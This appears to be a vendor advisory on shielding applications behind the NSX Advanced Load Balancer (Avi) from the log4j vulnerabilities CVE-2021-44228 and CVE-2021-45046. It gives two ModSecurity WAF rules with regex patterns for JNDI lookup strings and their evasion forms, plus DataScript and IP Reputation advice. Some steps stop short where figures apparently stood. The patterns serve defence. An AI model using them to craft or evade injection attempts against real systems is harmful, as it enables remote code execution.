Update Dec 16th:
The recommendations have been updated.
Resolution has been updated with the changes.
As the NSX Advanced Load Balancer (Avi) Platform provides multiple layers of Application Protection there are different features that can be used and enabled.
As minimum protection we recommend the usage of either NSX Advanced Load Balancer (Avi) WAF or NSX Advanced Load Balancer (Avi) DataScript in combination with IP Reputation blocking.
All of the proposed features are available to customers subscribed to Avi Pulse Cloud Services without extra charge.
Here are the individual steps:
Download Avi CRS 2021-4 from the NSX Advanced Load Balancer (Avi) customer portal.
We recommend one of the following:
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML:
//@* "@rx \${(?:jndi|ctx):" "id:4099843,phase:2,block,t:none,t:lowercase,t:urlDecodeUni,multimatch,msg:'CVE-2021-44228 / CVE-2021-45046 log4j vulnerability', tag:'attack-rce', tag:'paranoia-level/1', severity:'CRITICAL'"
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML:
//@* "@rx \${[^}]{0,4}\${" "id:4099844,phase:2,block,t:none,t:lowercase,t:urlDecodeUni,multimatch,msg:'CVE-2021-44228 / CVE-2021-45046 log4j vulnerability evasion', tag:'attack-rce', tag:'paranoia-level/1', severity:'CRITICAL'"
As another method to protect against CVE-2021-44228 we developed a DataScript that blocks the attack vectors.
The DataScript is available in the Avi DataScript Github repository.
It needs to be installed as follows:
Below is an example of attack getting blocked by DataScript
IP Reputation(*):
During our investigation we have noticed that many of the IPs that are constantly scanning the internet for vulnerable machines, are actually covered by our IP Reputation service. We highly recommend to use the included NSX Advanced Load Balancer (Avi) IP Reputation protection to block these known threat actors from accessing your Applications.
Note: As reported many scans are routed through the TOR network and by blocking these IPs general availability through TOR to your applications is impacted.
Below is an example of an IP currently blocked through IP Reputation
Change log: